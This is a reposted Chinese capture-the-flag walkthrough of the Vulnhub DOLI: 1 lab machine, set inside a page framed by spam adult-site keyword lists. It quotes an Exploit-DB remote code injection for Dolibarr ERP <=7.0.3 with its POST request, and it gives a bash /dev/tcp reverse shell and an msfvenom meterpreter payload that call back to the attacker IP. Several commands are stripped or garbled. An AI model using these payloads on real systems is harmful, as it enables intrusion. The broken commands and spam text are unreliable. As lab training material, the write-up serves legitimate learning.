亚洲精品免播放器在线观看-久久啊-久久观看视频-日韩精品亚洲专区在线电影不卡-在线观看免费a∨网站-在线观看毛片网站

推廣 熱搜: 廣場  Java  app  Word  營業  微信公眾號  北京代理記賬  商城  代理記賬  商標交易 

Vulnhub-DOLI: 1滲透

   2025-02-09 轉載網絡1960
核心提示:IP對靶機進行全端口綜合掃描通過nmap掃描發現開放了http/80和ssh/22這兩個端口,ssh的服務一般除了弱口令就沒什么可以直接利用的洞了(如果有,一點要私信博主討論)第二步:滲透測試下面的操作需要在Kali搭建Mysql數據庫(可

靶機下載鏈接:

點我直接下載靶機

如果不會導入上的靶機,請點擊我直達發車文章 在下面的操作中如果有不懂的可以直接私信博主 滲透概括 web域名破解子域爆破web目錄爆破搭建(用于配置靶機web)php代碼注入制作反彈的模塊提權 虛擬機的IP配置

通過arp- -l來獲取當前網段的存活ip。

再根據創建虛擬機的時候的MAC地址就可以拿到靶機的IP

滲透目標: 第一步:信息收集

我們這里用nmap -sS -sV -A -T4 -p- IP對靶機進行全端口綜合掃描

掃描結果如下

通過nmap掃描發現開放了http/80和ssh/22這兩個端口,ssh的服務一般除了弱口令就沒什么可以直接利用的洞了(如果有,一點要私信博主討論)

第二步:滲透測試

看來這個靶機滲透思路就是要從http下手了,我們接下來訪問一下這個靶機的web服務

發現是一個搭建的網站,這個頁面是的默認頁(這里挺奇怪的,nmap掃的時候中間件是,結果主頁卻是,有點奇怪的東西在里面)

Ctrl+u查看網頁的源碼,也沒發現什么特別的地方。如下兩圖

既然都沒有我們就直接用爆破目錄

發現居然什么都沒有掃描到,只有一個主界面的.html文件(下圖)

gobuster dir -u http://192.168.100.33/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

后來博主在一個滲透大佬那了解到,要給這個靶機一個"doli.thm"的域名和一個"erp.doli.thm"的子域(這個子域是爆出來的)

根據如下操作給文件添加這個靶機的ip和域名解析

PS:該靶機的項目

第三步:php代碼注入

我們用" doli"搜一下這個項目的exp

發現了一個PHP的代碼注入的說明文件。

我們cat一下看看這個說明文件,如下

┌──(root?kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/44964.txt
# Exploit Title: Unauthenticated Remote Code evaluation in Dolibarr ERP CRM =<7.0.3
# Date: 06/29/2018
# Exploit Author: om3rcitak - https://omercitak.com
# Vendor Homepage: https://dolibarr.org
# Software link: https://github.com/Dolibarr/dolibarr
# Version: =<7.0.3
# Tested on: Unix, Windows
## Technical Details
URL: http://{domain}/{dolibarr_path}/install/step1.php
Parameter Name: db_name
Parameter Type: POST
Attack Pattern: x\';system($_GET[cmd]);//
## Steps to reproduce the behavior
- Go to fresh install page.
- Click "Next Step" button for create example config file (conf/conf.php)
- Send this request:
```
POST {dolibarr_path}/install/step1.php HTTP/1.1
Host: {domain}
testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
```
- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
## Timeline
- 06/29/2018 18:30 - Found vulnerability.
- 06/29/2018 18:44 - Report vendor.
- 06/29/2018 20:38 - Vulnerability fixed by vendor.
GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032

這個說明文件大概內容就是

通過修改這個數據庫的配置文件發出請求的(改為這個說明文件上面的exp代碼就可以完成注入)

然后再通過這個網站的//.php的安裝文件來利用這個注入進去的代碼

那么下面開始實操

我們通過工具來爆一下//下面的目錄

dir -u -w /usr////-list-2.3-.txt -x php

發現了一個.php的php文件,并且302到的位置有一個/Seth.php?=ok的參數,所以是這個文件沒錯了

那么我們訪問一下這個php文件

我們直接拉到這個網站最底下,點擊這個star按鈕

點擊那個按鈕之后即可跳轉到如下的配置界面

下面的操作需要在Kali搭建數據庫(可以先自己看看教程),否則無法利用

根據那個.txt說明文件數據庫搭建好之后我們需要使用來抓包,來修改字段

點擊那個按鈕之后我們的就會彈出來,如下圖

我們需要修改參數里面的值

=x%5C%27%(%%%5D)%3B%2F%2F

發送之后我們接下再來訪問一下.php界面

會發現自動跳轉到了Seth.php界面了,如下圖

我們現在給Seth.php傳一下cmd=,發現正常返回了當前的用戶名了

第四步:!!!

我們使用kali利用nc工具監聽一下1234端口,用于獲取反彈

我們在給cmd參數注入如下命令,然后回車

bash+-c+%+-i+%3E%26+/dev/tcp/192.168.100.7/1234+0%3E%261%27

可以看到下圖,我們的nc監聽的端口拿到了web反彈下來的了

第五步:提權

我們對的日志目錄進行審查一下,如下

#到/var/log/nginx目錄下
www-data@Doli:/tmp$ cd /var/log/nginx
#用ls =al發現有一個.bk的可疑文件
www-data@Doli:/var/log/nginx$ ls -al
total 535240
drwxr-xr-x  3 root     adm           4096 Mar 22  2021 .
drwxrwxr-x 10 root     syslog        4096 Nov 26 15:35 ..
drwxr-xr-x  2 www-data www-data      4096 Mar 22  2021 .bk
-rw-r-----  1 www-data adm      338119216 Nov 26 23:52 access.log
-rw-r-----  1 www-data adm      209943239 Nov 26 23:43 error.log
#cd到這個.bk文件里面
www-data@Doli:/var/log/nginx$ cd .bk
#再用ls -al看一下,發現了一個access.log.bk文件
www-data@Doli:/var/log/nginx/.bk$ ls -al
total 180
drwxr-xr-x 2 www-data www-data   4096 Mar 22  2021 .
drwxr-xr-x 3 root     adm        4096 Mar 22  2021 ..
-rw-r----- 1 www-data www-data 175190 Mar 21  2021 access.log.bk

我們用cat看看這個.log.bk文件,往里下面慢慢翻,發現了一個被編碼的GET請求

172.16.1.1 - - [20/Mar/2021:13:03:38 +0000] "GET/5455644852464247526b464a526b4e4254455a435155314752304651516b5a4653554e4453464243526b564a5304e45544564435245314652304a4c5155464754304646526b74425155593d HTTP/1.1" 403 152 "-""Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"

我們現在找找其他的關鍵線索

前往/opt目錄找找,如下操作

#我們現在切換到/opt目錄
www-data@Doli:/var/log/nginx/.bk$ cd /opt
#用ls -al看一下,發現了一個ViewMe.png文件
www-data@Doli:/opt$ ls -al
total 44
drwxr-xr-x   4 root     root      4096 Mar 22  2021 .
drwxr-xr-x  23 root     root      4096 Nov 26 15:35 ..
-rw-r--r--   1 www-data www-data 21494 Oct 22  2013 ViewMe.png
drwxrwxr-x+  2 c3p0     c3p0      4096 Mar 21  2021 playbooks
dr--------   2 root     root      4096 Mar 21  2021 secrets
-rwxrwxr-x   1 root     m3dsec      55 Mar 22  2021 stewie.el
我們把這個文件拷貝到這個網站的install目錄下
www-data@Doli:/opt$ cp ViewMe.png /var/www/dolibarr/htdocs/install/

我們通過訪問

如下,發現了一個寫著一個CiTR!X的字樣(盲猜編碼),這應該是一個加密方法

我們訪問 (gchq..io)這個頁面,對我們上面獲得編碼信息進行解碼

可以看到處就出現了一個@@的密碼

如下圖,我們到/home目錄下看到工號有一個c3p0的用戶

我們用我們獲取到的密碼ssh登錄一下c3p0這個用戶,如下圖,成功登錄

我們現在回到kali里面去 ,用生成一個的載荷

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.7 LPORT=5678 -f elf > shell.elf

再拿開一個http服務,好用靶機的wget下載這個生成好的文件

我們再開一個終端,進入msf里面,使用//模塊并配置一下監聽地址和

如下圖操作所示

現在我們再到ssh連接的這里來,用wget下載一下這個

并且用" +x .elf"命令給這個文件一個執行權限,并用./.elf執行這個文件

執行完之后,我們就會發現我們之前在msf的模塊已經監聽到了反彈過來的

我們在這里執行一下""命令,把這個會話保存到后臺去

我們使用msf的"http://"模塊給靶機提權

根據下圖進行操作

攻擊成功之后,我們用命令進入到靶機的命令行,進行如下操作

獲取到flag之后我們的靶機就已經滲透完成

 
標簽: nmap ssh http Apache gubuter
反對 0舉報 0 收藏 0 打賞 0評論 0
 
更多>同類資訊
推薦圖文
推薦資訊
點擊排行
合作伙伴
網站首頁  |  關于我們  |  聯系方式  |  使用協議  |  版權隱私  |  網站地圖  |  排名推廣  |  廣告服務  |  積分換禮  |  網站留言  |  RSS訂閱  |  違規舉報  |  冀ICP備2023006999號-8
 
主站蜘蛛池模板: 久久91精品国产91久久小草 | 手机在线观看国产精选免费 | 国内精品久久久久影院不卡 | 91精品国产91久久综合 | 91亚洲 欧美 国产 制服 动漫 | 91在线一区二区三区 | 91精品国产高清久久久久久91 | 精品一区二区三区在线观看 | 国产在线观看一区二区三区 | 性夜影院爽黄a爽免费看网站 | 久久久久无码国产精品一区 | 国产成人手机在线好好热 | 久久婷婷久久一区二区三区 | 国产精品免费在线播放 | 久久99一区 | 国产成人欧美一区二区三区的 | 亚洲成人精品 | 亚洲国产成人精品91久久久 | 日韩精品一区二区三区视频 | 国产99精品视频 | 伊人久久亚洲综合天堂 | 国产亚洲一欧美一区二区三区 | 国产精品va在线观看无 | 日韩欧美综合在线 | 免费黄a | 精品一区二区三区五区六区 | 欧美 日韩 亚洲另类专区 | 久久国产精品视频 | 久久精品a亚洲国产v高清不卡 | 欧美午夜网| 中文字幕精品一区二区精品 | 国产成人综合久久综合 | 欧美精品日韩一区二区三区 | 日韩综合第一页 | 欧美日韩国产精品自在自线 | 一级毛片免费下载 | 97精品高清一区二区三区 | 日韩精品在线第一页 | 国产精品久久精品 | 成人欧美一区二区三区在线 | 国产一区二区在线播放 |